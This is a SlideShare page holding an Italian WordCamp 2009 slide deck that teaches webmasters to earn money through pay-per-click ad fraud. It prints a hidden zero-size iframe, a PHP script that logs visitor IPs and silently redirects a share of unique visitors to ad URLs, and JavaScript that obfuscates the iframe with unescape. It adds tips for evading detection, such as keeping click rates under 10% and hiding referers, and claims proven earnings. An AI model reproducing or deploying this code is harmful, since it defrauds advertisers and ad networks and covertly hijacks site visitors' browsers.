Portarsi A Casa Uno Stipendo Con Wordpress

26,005 views

Published on

Slide di Luca Mercatanti (www.luca-mercatanti.com) utilizzate per il WordCamp 2009 di Milano.

Published in: Technology, Business
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
26,005
On SlideShare
0
From Embeds
0
Number of Embeds
920
Actions
Shares
0
Downloads
40
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Portarsi A Casa Uno Stipendo Con Wordpress

  1. 1. Portarsi a casa uno stipendio con WordPress (e qualche trucco) Luca Mercatanti // www.luca-mercatanti.com
  2. 2. Cosa ci serve? • Spazio Web • WordPress • Visite • Servizio di advertising (Google, JuiceAdv, etc…) • Un pò di codice (offuscato in parte in queste slide) Luca Mercatanti // www.luca-mercatanti.com [2]
  3. 3. Tutto ciò è testato Tutto ciò che vedrete in queste slide è testato e funzionante al 100%. Per dimostrare il funzionamento delle tecniche ho deciso di inserire in questa presentazione dei documenti che ne attestano la veridicità. Luca Mercatanti // www.luca-mercatanti.com [3]
  4. 4. Una volta… I circuiti di advertising consegnavano un unico link ed immagine da pubblicare nel proprio sito Web. Ogni qual volta che l’utente effettuava un click veniva consegnata una certa cifra. • Un codice simile a questo <iframe src=“URL PUBBLICITARIOquot; width=quot;0quot; height=quot;0quot;></iframe> • Oppure più “raffinato” <?php function write($ip){ Si potevano quindi di poter guadagnare cifre esorbitanti in $file_txt=fopen(quot;ip.txtquot;,quot;a+quot;); fwrite($file_txt,quot;$ipnquot;); pochissimo tempo e senza sforzo. fclose($file_txt); } function check($ip){ $lineas = file(quot;ip.txtquot;); foreach($lineas as $linea){ if (eregi($ip, $linea)) { Abbinando inoltre altri tipi di tecniche era praticamente impossibile return 1; } (o quasi) essere scoperti. } return 0; } Per molti Webmaster questo “giochino” è andato avanti per molto $ip=$_SERVER['REMOTE_ADDR']; $numero = rand(1, 10); tempo. if($numero > 7){ if(check($ip)) exit(O); write($ip); I vari codici e tecniche riportate qui di seguito sono vietate nel 100% dei ciruiti di banner header ('location: URL PUBBLICITARIO'); } ?> Luca Mercatanti // www.luca-mercatanti.com [4]
  5. 5. Adesso invece… Adesso il 99% dei sistemi di advertising non adotta più un link statico, ma tramite un codice JavaScript viene generato, ad ogni refresh di pagina, un nuovo url e banner, rendendo impossibile l’applicazione dell’iframe o tecniche simili. http://googleads.g.doubleclick.net/pagead/iclk?sa=l&ai=BpiovZPHLSfbMNZCV-Aa4utD3DL2u_D61- 5i3AcCNtwGQgxkQARgBIN3N4g4oBDgAUNe_- u8HYP2qi4TQEbIBFWJsb2cubWVyaXZhdmlhZ2dpLmNvbboBCTcyOHg5MF9hc8gBAdoBHWh0dHA6Ly9ibG9nLm1lcml2YX ZpYWdnaS5jb20vyAKhtMkEqAMByAMH6APQAegDswHoA_4D9QMIAAAEmAQA&num=1&adurl=http://www.tripadviso r.it/SmartDeals-g187464-m10802-Minorca_Balearic_Islands-Hotel- Deals.html%3Fsupci%3D2326373%26supkw%3Dminorca%2520turismo%26suppm%3Dblog.merivaviaggi.com%26supai %3D300544949%26supsc%3Dc&client=ca-pub-5599621198782055&nm=6 http://googleads.g.doubleclick.net/pagead/iclk?sa=l&ai=BVVmiqfHLSdvoFI6K-AaQ0- HSDdv0lmPJvfvyCcCNtwHw9RIQAhgCIN3N4g4oBDgAULXo7LMEYP2qi4TQEaABz7aV_gOyARVibG9nLm1lcml2YXZpYWdn aS5jb226AQk3Mjh4OTBfYXPIAQHaAR1odHRwOi8vYmxvZy5tZXJpdmF2aWFnZ2kuY29tL4ACAakC07Jg47THtj7IAo23jwaoA wHIAwfoA9AB6AOzAegD_gP1AwgAAASYBAA&num=2&adurl=http://www.visitmenorca.com/default.asp%3Flang%3DIT &client=ca-pub-5599621198782055&nm=14 http://googleads.g.doubleclick.net/pagead/iclk?sa=l&ai=B6BZ_qfHLSdvoFI6K-AaQ0-HSDbzg- 3PUuKDJCcCNtwGwgSQQBBgEIN3N4g4oBDgAUJ3esYb4_____wFg_aqLhNARoAHyqcPvA7IBFWJsb2cubWVyaXZhdmlhZ2 dpLmNvbboBCTcyOHg5MF9hc8gBAdoBHWh0dHA6Ly9ibG9nLm1lcml2YXZpYWdnaS5jb20vgAIBqQLTsmDjtMe2PsgC8trz CKgDAcgDB-gD0AHoA7MB6AP- A_UDCAAABJgEAA&num=4&adurl=http://www.edreams.it/%3Fportal%3Dgoog0229%26utm_campaign%3Dg-c- flights&client=ca-pub-5599621198782055&nm=3 Luca Mercatanti // www.luca-mercatanti.com [5]
  6. 6. Pratica #1 Informazioni sulla società utilizzata • Servizio italiano. • Effettua i pagamenti regolarmente. • Effettua i pagamenti tramite bonifico/PostePay. • L’attivazione deve essere convalidata manualmente (24/48 ore di tempo). • Richieste 1500/2000 visite uniche al giorno minime. Informazioni sul Blog utilizzato • www.italiastreaming.com • 8000 visite uniche al giorno Luca Mercatanti // www.luca-mercatanti.com [6]
  7. 7. Pratica #2 Pagamento ricevuto correttamente: il servizio è serio e si procede Luca Mercatanti // www.luca-mercatanti.com [7]
  8. 8. Pratica #3 Avviamo la tecnica e… 400€ in 5 giorni 80€ giornalieri Luca Mercatanti // www.luca-mercatanti.com [8]
  9. 9. Pratica #4 Pagamento ricevuto correttamente: LA TECNICA FUNZIONA Luca Mercatanti // www.luca-mercatanti.com [9]
  10. 10. Un pò di codice #1 - Intro Lo script per ingannare i sistemi di PPC è composto (in maniera base) da 2 parti: • Iframe o codice analogo nascosto • Script che effettua il click Da tenere presente: 1. Il codice Iframe verrà nascosto affinchè il trucco non venga scoperto. 2. Il codice Iframe può essere inserito su più portali per aumentare il guadagno. 3. Se si attua la seconda opzione bisogna utilizzare un terzo codice per ingannare il sistema di controllo del referer. 4. Non esagerare con la percentuale di click. Una percentuale troppo alta (> 10%) può destare sospetti ed aumentare il rischio di controlli approfonditi. Luca Mercatanti // www.luca-mercatanti.com [ 10 ]
  11. 11. Un pò di codice #2 - Iframe Iframe Semplicissimo codice che permette di inserire una pagina Web all’interno di un altra: <iframe src=“URL SCRIPTquot; width=quot;0quot; height=quot;0quot;></iframe> Grazie a questa riga di codice richiameremo ad ogni apertura di pagina anche lo script PHP. Luca Mercatanti // www.luca-mercatanti.com [ 11 ]
  12. 12. Un pò di codice #3 - Script Ecco il cuore del sistema: questo codice permette di poter ingannare il sistema PPC, generando click fasulli sui banner pubblicitari generati ad ogni refresh tramite JS. Luca Mercatanti // www.luca-mercatanti.com [ 12 ]
  13. 13. Un pò di codice #4 - Nascondiamoci Nel precedente script, quando quest’ultimo indirizza l’utente verso l’url che viene generato, viene utilizzato un sistema che impedisce all’amministratore del PPC, in caso in cui effettuase dei controlli, di risalire all’esatta pagina da cui è partito il click. Questo per evitare che scopra lo script in questione. Per destare ancora meno sospetti è possibile realizzare uno script da inserire direttamente nel proprio Blog, senza appoggiarsi a servizi esterni, così da evitare il problema di un referer inesistente. Nel servizio PPC da me testato il referer non veniva controllato (potevo così utilizzare servizi esterni senza problemi) Luca Mercatanti // www.luca-mercatanti.com [ 13 ]
  14. 14. Un pò di codice #5 - Nascondiamoci Per essere maggiormente sicuri conviene nascondere anche il codice iframe. Per fare ciò trasformiamo il nostro codice in Unescape e tramite un pò di codice Javascript ricostruiamo successivamente la vera struttura. %3C%69%66%72%61%6D%65%20%73%72%63%3D%22%55%52%4C%20%53%43%52 49%50%54%22%20%6E%61%6D%65%3D%22%69%73%22%20%69%64%3D%22%69 73%22%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%20% 3%74%79%6C%65%3D%22%62%6F%72%64%65%72%3A%20%30%20%64%61%73%6 %65%64%20%23%30%30%30%30%36%36%3B%22%3E%0A%3C%2F%69%66%72%61 6D%65%3E <iframe src=“URL SCRIPTquot; width=quot;0quot; height=quot;0quot;></iframe> <SCRIPT LANGUAGE = quot;Javascriptquot;> <!-- var Words = quot;CODICE UNESCAPEquot; function SetNewWords() { var NewWords; NewWords = unescape(Words); document.write(NewWords); } SetNewWords(); // --> </SCRIPT> Luca Mercatanti // www.luca-mercatanti.com [ 14 ]
  15. 15. ATTENZIONE I vari codici e tecniche appena illustrate sono vietate nel 100% dei sistemi PPC Da alcune ricerche che ho condotto dopo aver testato il funzionamento di tale tecnica ho scoperto che vi sono ancora servizi ITALIANI e PAGANTI che possono essere ingannati tramite questo sistema. Luca Mercatanti // www.luca-mercatanti.com [ 15 ]
  16. 16. GRAZIE Grazie per l’attenzione Luca Mercatanti // www.luca-mercatanti.com [ 16 ]

×